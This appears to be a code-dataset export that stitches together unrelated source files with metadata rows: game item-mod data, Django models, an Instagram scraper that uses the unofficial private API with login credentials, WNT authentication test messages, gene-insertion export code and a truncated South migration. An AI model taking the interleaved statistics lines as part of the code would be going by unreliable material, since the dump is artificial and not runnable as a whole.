"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(44, '(23 - 26)% increased Attack Damage'), (88, '(27 - 30)% increased Attack Damage'), (200, '(31 - 35)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(44, '(23 - 26)% increased Spell Damage'), (88, '(27 - 30)% increased Spell Damage'), (200, '(31 - 35)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(15 - 17)% increased Chaos Damage'), (2, '(18 - 20)% increased Chaos Damage'), (10, '(21 - 23)% increased Chaos Damage')],
},
}
| 220.770753
| 1,087
| 0.645777
| 76,920
| 513,292
| 4.309308
| 0.007098
| 0.035523
| 0.012013
| 0.02075
| 0.977639
| 0.957622
| 0.936924
| 0.917547
| 0.901234
| 0.890854
| 0
| 0.112626
| 0.17222
| 513,292
| 2,325
| 1,088
| 220.770753
| 0.667505
| 0
| 0
| 0.733333
| 1
| 0.194409
| 0.811924
| 0.00089
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
b98b03fb17df4bed1e7e97e20f60429c52a2b94d
| 98
|
py
|
Python
|
mycloud/webdav/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 4
|
2019-11-28T22:10:43.000Z
|
2022-01-23T15:18:26.000Z
|
mycloud/webdav/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 18
|
2019-01-20T22:30:48.000Z
|
2020-06-09T21:16:07.000Z
|
mycloud/webdav/__init__.py
|
thomasgassmann/mycloud-cli
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | null | null | null |
from mycloud.webdav.server import WebdavServer
from mycloud.webdav.client import MyCloudDavClient
| 32.666667
| 50
| 0.877551
| 12
| 98
| 7.166667
| 0.666667
| 0.255814
| 0.395349
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 51
| 49
| 0.955556
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b9bec5ac4506d778655e31a9683c8b5c4a7cda87
| 3,713
|
py
|
Python
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 1
|
2017-07-24T16:47:57.000Z
|
2017-07-24T16:47:57.000Z
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 4
|
2017-05-10T15:34:23.000Z
|
2017-09-06T10:37:26.000Z
|
landavailability/voa/models.py
|
alphagov/land-availability-voa
|
424c9ffe30ba16dcc5a1a0ed7b0138acc3d549ed
|
[
"MIT"
] | 2
|
2019-08-29T11:52:17.000Z
|
2021-04-10T19:54:35.000Z
|
from django.db import models
class Property(models.Model):
assessment_reference = models.CharField(
max_length=32, blank=True, null=True)
uarn = models.CharField(unique=True, max_length=100)
ba_code = models.CharField(max_length=255, blank=True, null=True)
ba_name = models.CharField(max_length=255, blank=True, null=True)
ba_reference_number = models.CharField(max_length=255, unique=True)
firm_name = models.CharField(max_length=255, blank=True, null=True)
number_or_name = models.CharField(max_length=255, blank=True, null=True)
sub_street_1 = models.CharField(max_length=255, blank=True, null=True)
sub_street_2 = models.CharField(max_length=255, blank=True, null=True)
sub_street_3 = models.CharField(max_length=255, blank=True, null=True)
street = models.CharField(max_length=255, blank=True, null=True)
town = models.CharField(max_length=255, blank=True, null=True)
postal_district = models.CharField(max_length=255, blank=True, null=True)
county = models.CharField(max_length=255, blank=True, null=True)
postcode = models.CharField(max_length=255, blank=True, null=True)
scheme_ref = models.CharField(max_length=255, blank=True, null=True)
primary_description = models.CharField(
max_length=255, blank=True, null=True)
total_area = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
subtotal = models.DecimalField(max_digits=16, decimal_places=2, null=True)
total_value = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adopted_rv = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
list_year = models.IntegerField(null=True)
vo_ref = models.CharField(max_length=255, blank=True, null=True)
from_date = models.CharField(max_length=255, blank=True, null=True)
to_date = models.CharField(max_length=255, blank=True, null=True)
scat_code_only = models.CharField(max_length=255, blank=True, null=True)
unit_of_measurement = models.CharField(
max_length=255, blank=True, null=True)
unadjusted_price = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adjustement_total_before = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
adjustement_total = models.DecimalField(
max_digits=16, decimal_places=2, null=True)
class Area(models.Model):
area_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True, related_name='areas')
floor = models.CharField(max_length=255, blank=True, null=True)
description = models.CharField(max_length=255, blank=True, null=True)
area = models.DecimalField(max_digits=16, decimal_places=2, null=True)
price = models.DecimalField(max_digits=16, decimal_places=2, null=True)
value = models.DecimalField(max_digits=16, decimal_places=2, null=True)
class Adjustment(models.Model):
adjustment_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True,
related_name='adjustments')
description = models.CharField(max_length=255, blank=True, null=True)
percent = models.DecimalField(max_digits=16, decimal_places=2, null=True)
class Additional(models.Model):
additional_property = models.ForeignKey(
Property, on_delete=models.SET_NULL, null=True,
related_name='additionals')
other_oa_description = models.CharField(
max_length=255, blank=True, null=True)
size = models.DecimalField(max_digits=16, decimal_places=2, null=True)
price = models.DecimalField(max_digits=16, decimal_places=2, null=True)
value = models.DecimalField(max_digits=16, decimal_places=2, null=True)
| 50.863014
| 78
| 0.740102
| 515
| 3,713
| 5.141748
| 0.159223
| 0.126888
| 0.16994
| 0.226586
| 0.813822
| 0.803625
| 0.803625
| 0.803625
| 0.803625
| 0.654079
| 0
| 0.038547
| 0.14759
| 3,713
| 72
| 79
| 51.569444
| 0.798104
| 0
| 0
| 0.265625
| 0
| 0
| 0.007272
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015625
| 0
| 0.765625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
b9e66d6c56e6eb5dcc48503e790b45e3d825f9e8
| 43
|
py
|
Python
|
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | 1
|
2020-06-16T05:53:24.000Z
|
2020-06-16T05:53:24.000Z
|
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | null | null | null |
test/test_MainWindow.py
|
goncamateus/sim2d_game_analyzer
|
3e264df75896b8856163478535fdeeeef2d66b2f
|
[
"MIT"
] | null | null | null |
import pytest
def test_first():
pass
| 7.166667
| 17
| 0.674419
| 6
| 43
| 4.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.255814
| 43
| 5
| 18
| 8.6
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
e0029ff51289cfefb26b1e154d37761f38fa1d5a
| 226
|
py
|
Python
|
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | 1
|
2021-02-09T04:39:05.000Z
|
2021-02-09T04:39:05.000Z
|
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | null | null | null |
noise/charsets.py
|
wakfi/Noise-Cipher
|
b0ed00bcb396bcae15547cc43fe069732a4bb60f
|
[
"MIT"
] | 1
|
2021-02-09T03:58:46.000Z
|
2021-02-09T03:58:46.000Z
|
def charset_alpha():
return list("qwertyuiopasdfghjklzxcvbnm")
def charset_special():
return list("+=%_,.<>{}[]!@#$/^&*()\\`~-:;,?")
def charset_mix():
return list("qwertyuiopasdfghjklzxcvbnm+=%_<>{}[]!@#$/^&*()\\`~-:;,?.")
| 37.666667
| 72
| 0.584071
| 17
| 226
| 7.470588
| 0.470588
| 0.23622
| 0.566929
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.061947
| 226
| 6
| 72
| 37.666667
| 0.599057
| 0
| 0
| 0
| 0
| 0
| 0.497797
| 0.497797
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 9
|
e014306d5a7ab0b8b97b8038a47c1f90758fb8eb
| 109
|
py
|
Python
|
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
source/appModules/sts.py
|
SWEN-712/screen-reader-brandonp728
|
e30c25ad2d10ce632fac0548696a61a872328f59
|
[
"bzip2-1.0.6"
] | null | null | null |
"""App module for Spring Tool Suite
This simply uses the app module for Eclipse.
"""
from .eclipse import *
| 18.166667
| 44
| 0.733945
| 17
| 109
| 4.705882
| 0.764706
| 0.225
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.183486
| 109
| 5
| 45
| 21.8
| 0.898876
| 0.706422
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e03dda7cf6e25b7ae21f106d59447852870e3c41
| 88
|
py
|
Python
|
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
UniProtClient/__init__.py
|
hengwei-chan/uniprot
|
362bbd43f932d6857ad185c6dda70d8060ebf558
|
[
"MIT"
] | null | null | null |
from .ClientClasses import UniProtMapper
from .ClientClasses import UniProtProteinInfo
| 22
| 45
| 0.875
| 8
| 88
| 9.625
| 0.625
| 0.441558
| 0.597403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102273
| 88
| 3
| 46
| 29.333333
| 0.974684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e041d111e1906c97d276d4e9de998f9f1fc384ef
| 4,116
|
py
|
Python
|
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
src/utils/infinite_scraper.py
|
neeraj310/DLfM_BrandManagement
|
1df952ed38018391c876b822338f30ff9c9f6568
|
[
"Apache-2.0"
] | null | null | null |
from instagram_private_api import Client
# both functions retrieve images from the specified Instagram pages
# either for the official or the unofficial account of the brand
# they return a list of image URLs
def unofficial(user_name, password, LIMIT_IMAGE_COUNT, HASHTAG):
api = Client(user_name, password)
all_hash_image_posts_urls = []
next_max_id = None
while (api.feed_tag(HASHTAG, api.generate_uuid())["more_available"] == True) and (
len([item for sublist in all_hash_image_posts_urls for item in sublist]) <= LIMIT_IMAGE_COUNT):
if next_max_id == None:
# Gets the first 12 posts
posts = api.feed_tag(HASHTAG, api.generate_uuid())
len(posts['items'])
image_urls = []
for i in range(len(posts['items'])):
try:
url = posts['items'][i]['image_versions2']['candidates'][0][
'url'] # some posts do not have 'image_version2', they are overlooked in that case
image_urls.append(url)
except:
pass
# Extract the value *next_max_id* from the above response, this is needed to load the next 12 posts
next_max_id = posts["next_max_id"]
all_hash_image_posts_urls.append(image_urls)
else:
next_page_posts = api.feed_tag(HASHTAG, api.generate_uuid())
len(next_page_posts['items'])
# get image urls
next_image_urls = []
for i in range(len(next_page_posts['items'])):
try:
url = next_page_posts['items'][i]['image_versions2']['candidates'][0]['url']
next_image_urls.append(url)
except:
pass
# Extract the value *next_max_id*
next_max_id = next_page_posts["next_max_id"]
all_hash_image_posts_urls.append(next_image_urls)
else:
flat_hash_image_posts_urls = [item for sublist in all_hash_image_posts_urls for item in sublist]
print(f"A total of {len(flat_hash_image_posts_urls)} image post urls were retrieved from the Instagram page.")
return flat_hash_image_posts_urls
def official(user_name, password, LIMIT_IMAGE_COUNT, USERNAME):
api = Client(user_name, password)
all_image_posts_urls = []
next_max_id = None
while (api.username_feed(USERNAME, max_id=next_max_id)["more_available"] == True) and (
len([item for sublist in all_image_posts_urls for item in sublist]) <= LIMIT_IMAGE_COUNT):
if next_max_id == None:
# Gets the first 12 posts
posts = api.username_feed(USERNAME)
len(posts['items'])
image_urls = []
for i in range(len(posts['items'])):
try:
url = posts['items'][i]['image_versions2']['candidates'][0]['url']
image_urls.append(url)
except:
pass
# Extract the value *next_max_id* from the above response, this is needed to load the next 12 posts
next_max_id = posts["next_max_id"]
all_image_posts_urls.append(image_urls)
else:
next_page_posts = api.username_feed(USERNAME, max_id=next_max_id)
len(next_page_posts['items'])
# get image urls
next_image_urls = []
for i in range(len(next_page_posts['items'])):
try:
url = next_page_posts['items'][i]['image_versions2']['candidates'][0]['url']
next_image_urls.append(url)
except:
pass
# Extract the value *next_max_id*
next_max_id = next_page_posts["next_max_id"]
all_image_posts_urls.append(next_image_urls)
else:
flat_image_posts_urls = [item for sublist in all_image_posts_urls for item in sublist]
print(f"A total of {len(flat_image_posts_urls)} image post urls were retrieved from the Instagram page.")
return flat_image_posts_urls
| 44.258065
| 119
| 0.603013
| 541
| 4,116
| 4.288355
| 0.181146
| 0.043103
| 0.069828
| 0.062069
| 0.878879
| 0.857328
| 0.806466
| 0.793966
| 0.781897
| 0.67069
| 0
| 0.005967
| 0.307823
| 4,116
| 92
| 120
| 44.73913
| 0.808354
| 0.139213
| 0
| 0.628571
| 0
| 0
| 0.124363
| 0.01728
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.114286
| 0.014286
| 0
| 0.071429
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
e04f071ba3fe793cccc37aab8e381dcee1a65242
| 3,736
|
py
|
Python
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 9
|
2019-12-20T06:41:37.000Z
|
2020-09-21T03:34:47.000Z
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 38
|
2019-05-09T09:55:01.000Z
|
2022-01-04T10:52:46.000Z
|
wrappers/python/tests/wnt/messages/login.py
|
vvalkonen/backend-apis
|
769a45e6a90a87ab5af78e9a50ebde12f4821b99
|
[
"Apache-2.0"
] | 13
|
2019-10-29T19:51:08.000Z
|
2021-11-25T15:08:02.000Z
|
"""
Login messages for testing
==========================
Authentication server login messages for testing
.. Copyright:
Copyright Wirepas Ltd 2019 licensed under Apache License, Version 2.0
See file LICENSE for full license details.
"""
from wirepas_messaging.wnt.ws_api import AuthenticationMessages
class Login(AuthenticationMessages):
"""The class generates and decodes login messages for testing"""
def __init__(self, logger, protocol_version: int) -> None:
super(Login, self).__init__(logger, protocol_version)
def message_login_wo_version(self, username: str, password: str) -> dict:
"""Returns a login request message without version"""
message = dict(
type=AuthenticationMessages.MessageTypes.LOGIN.value,
data=dict(username=username, password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wo_type(self, username: str, password: str) -> dict:
"""Returns a login request message without type"""
message = dict(
version=self.protocol_version,
data=dict(username=username, password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wo_username(self, password: str) -> dict:
"""Returns a login request message without user name"""
message = dict(
version=self.protocol_version,
type=AuthenticationMessages.MessageTypes.LOGIN.value,
data=dict(password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wo_password(self, username: str) -> dict:
"""Returns a login request message without password"""
message = dict(
version=self.protocol_version,
type=AuthenticationMessages.MessageTypes.LOGIN.value,
data=dict(username=username),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wrong_version(self, username: str, password: str) -> dict:
"""Returns a login request message with wrong version"""
message = dict(
type=AuthenticationMessages.MessageTypes.LOGIN.value,
version=34,
data=dict(username=username, password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wrong_type(self, username: str, password: str) -> dict:
"""Returns a login request message with wrong type"""
message = dict(
version=self.protocol_version,
type=123,
data=dict(username=username, password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wrong_username(self, password: str) -> dict:
"""Returns a login request message with wrong user name"""
message = dict(
version=self.protocol_version,
type=AuthenticationMessages.MessageTypes.LOGIN.value,
data=dict(username="incorrect", password=password),
)
self.logger.info(self.json_dump_pretty(message))
return message
def message_login_wrong_password(self, username: str) -> dict:
"""Returns a login request message with wrong password"""
message = dict(
version=self.protocol_version,
type=AuthenticationMessages.MessageTypes.LOGIN.value,
data=dict(username=username, password="something"),
)
self.logger.info(self.json_dump_pretty(message))
return message
| 35.580952
| 80
| 0.649893
| 404
| 3,736
| 5.866337
| 0.168317
| 0.037975
| 0.050633
| 0.050633
| 0.818143
| 0.818143
| 0.818143
| 0.781857
| 0.74346
| 0.736709
| 0
| 0.00394
| 0.252677
| 3,736
| 104
| 81
| 35.923077
| 0.844914
| 0.18576
| 0
| 0.606061
| 0
| 0
| 0.006071
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.136364
| false
| 0.227273
| 0.015152
| 0
| 0.287879
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
167a3abf86e6bac79acfd6f9468b2ada4c43d8ac
| 5,567
|
py
|
Python
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 2
|
2021-11-23T09:39:35.000Z
|
2022-01-25T15:49:45.000Z
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 76
|
2021-07-07T18:31:44.000Z
|
2022-03-22T10:04:40.000Z
|
transposonmapper/exporting/save_per_gene_insertions.py
|
EKingma/Transposonmapper
|
1413bda16a0bd5f5f3ccf84d86193c2dba0ab01b
|
[
"Apache-2.0"
] | 2
|
2021-09-16T10:56:20.000Z
|
2022-01-25T12:33:25.000Z
|
def save_per_gene_insertions(
filename,
tn_coordinates,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
):
"""This function write in txt file 5 columns of information about transposon insertions separated by tabs.
The tabs are: Gene name,Chromosome,Start location,End location,Insertion locations,Reads per insertion location
Parameters
----------
filename : str
Path with the filename extension included(e.g "data_file/file.txt") describing where do you want to store the results.
By default it will be stored in the same location as the bamfile, with the same basename.
Example, if the bamfile path is data_file/data_1.bam then the per_gene file will be data_file/data_1.bam_pergene_insertions.txt
tn_coordinates : dict
Last output of the function get_insertions _,_, tn_coordinates_per_gene = get_insertions_and_reads(
gene_coordinates, tncoordinatescopy_array, readnumb_array)
gene_coordinates : dict
Output of the function add_chromosome_length: gene_coordinates = add_chromosome_length(
gene_coordinates, chr_lengths_cumsum, ref_tid_roman)
chr_lengths_cumsum : dict
last output of the function get_sequence_length : _, chr_lengths_cumsum = get_sequence_length(bam)
ref_tid_roman : dict
Dictionary describing roman names as keys ,
ref_romannums = chromosomename_roman_to_arabic()[1]
ref_tid_roman = {key: value for key, value in zip(ref_romannums, ref_tid)}
aliases_designation : dict
Last output of the function read_genes _, _, aliases_designation = read_genes(
gff_file, essential_file, gene_name_file)
"""
with open(filename, "w") as f:
f.write(
"Gene name\tChromosome\tStart location\tEnd location\tInsertion locations\tReads per insertion location\n"
)
for gene in tn_coordinates:
gene_chrom = ref_tid_roman.get(gene_coordinates.get(gene)[0])
tncoordinates = [
ins - chr_lengths_cumsum.get(gene_chrom)
for ins in tn_coordinates[gene][3]
]
if gene in aliases_designation:
gene_alias = aliases_designation.get(gene)[0]
else:
gene_alias = gene
f.write(
gene_alias
+ "\t"
+ str(tn_coordinates[gene][0])
+ "\t"
+ str(tn_coordinates[gene][1] - chr_lengths_cumsum.get(gene_chrom))
+ "\t"
+ str(tn_coordinates[gene][2] - chr_lengths_cumsum.get(gene_chrom))
+ "\t"
+ str(tncoordinates)
+ "\t"
+ str(tn_coordinates[gene][4])
+ "\n"
)
def save_per_essential_insertions(
filename,
tn_coordinates,
gene_coordinates,
chr_lengths_cumsum,
ref_tid_roman,
aliases_designation,
):
"""This function generates a .txt file with the insertions in the annotated
essential genes in WT.
Parameters
----------
filename : str
Path with the filename extension included(e.g "data_file/file.txt")
describing where do you want to store the results.
By default it will be stored in the same location as the bamfile,
with the same basename.
Example, if the bamfile path is data_file/data_1.bam then the file will be data_file/data_1.bam_peressential_insertions.txt
tn_coordinates : dict
Last output of the function get_insertions _,_, tn_coordinates_per_gene = get_insertions_and_reads(
gene_coordinates, tncoordinatescopy_array, readnumb_array)
gene_coordinates : dict
Output of the function add_chromosome_length: gene_coordinates = add_chromosome_length(
gene_coordinates, chr_lengths_cumsum, ref_tid_roman)
chr_lengths_cumsum : dict
last output of the function get_sequence_length : _, chr_lengths_cumsum = get_sequence_length(bam)
ref_tid_roman : dict
Dictionary describing roman names as keys ,
ref_romannums = chromosomename_roman_to_arabic()[1]
ref_tid_roman = {key: value for key, value in zip(ref_romannums, ref_tid)}
aliases_designation : dict
Last output of the function read_genes _, _, aliases_designation = read_genes(
gff_file, essential_file, gene_name_file)
"""
with open(filename, "w") as f:
f.write(
"Essential gene name\tChromosome\tStart location\tEnd location\tInsertion locations\tReads per insertion location\n"
)
for gene in tn_coordinates:
gene_chrom = ref_tid_roman.get(gene_coordinates.get(gene)[0])
tncoordinates = [
ins - chr_lengths_cumsum.get(gene_chrom)
for ins in tn_coordinates[gene][3]
]
if gene in aliases_designation:
gene_alias = aliases_designation.get(gene)[0]
else:
gene_alias = gene
f.write(
gene_alias
+ "\t"
+ str(tn_coordinates[gene][0])
+ "\t"
+ str(tn_coordinates[gene][1] - chr_lengths_cumsum.get(gene_chrom))
+ "\t"
+ str(tn_coordinates[gene][2] - chr_lengths_cumsum.get(gene_chrom))
+ "\t"
+ str(tncoordinates)
+ "\t"
+ str(tn_coordinates[gene][4])
+ "\n"
)
| 40.635036
| 135
| 0.633196
| 679
| 5,567
| 4.913108
| 0.181149
| 0.070144
| 0.071343
| 0.045564
| 0.908873
| 0.908873
| 0.908873
| 0.908873
| 0.893285
| 0.893285
| 0
| 0.005341
| 0.293695
| 5,567
| 136
| 136
| 40.933824
| 0.843082
| 0.50494
| 0
| 0.861111
| 0
| 0.013889
| 0.095649
| 0.018032
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027778
| false
| 0
| 0
| 0
| 0.027778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
168c261b5d97a7d99a4494670d3e2ae9e67e4141
| 46,260
|
py
|
Python
|
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | null | null | null |
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | null | null | null |
envelope/migrations/0002_auto__add_field_solutioncontact_user_name__add_field_companycontact_us.py
|
affan2/django-envelope
|
7020b0e4f1cce2f3fed9336a7f8aa1abca9f9ae7
|
[
"MIT"
] | 1
|
2020-01-08T09:06:37.000Z
|
2020-01-08T09:06:37.000Z
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'SolutionContact.user_name'
db.add_column(u'envelope_solutioncontact', 'user_name',
self.gf('django.db.models.fields.TextField')(default='no user name'),
keep_default=False)
# Adding field 'CompanyContact.user_name'
db.add_column(u'envelope_companycontact', 'user_name',
self.gf('django.db.models.fields.TextField')(default='no user name'),
keep_default=False)
# Adding field 'ProductContact.user_name'
db.add_column(u'envelope_productcontact', 'user_name',
self.gf('django.db.models.fields.TextField')(default='no user name'),
keep_default=False)
def backwards(self, orm):
# Deleting field 'SolutionContact.user_name'
db.delete_column(u'envelope_solutioncontact', 'user_name')
# Deleting field 'CompanyContact.user_name'
db.delete_column(u'envelope_companycontact', 'user_name')
# Deleting field 'ProductContact.user_name'
db.delete_column(u'envelope_productcontact', 'user_name')
models = {
u'actstream.action': {
'Meta': {'ordering': "('-timestamp',)", 'object_name': 'Action'},
'action_object_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'action_object'", 'null': 'True', 'to': u"orm['contenttypes.ContentType']"}),
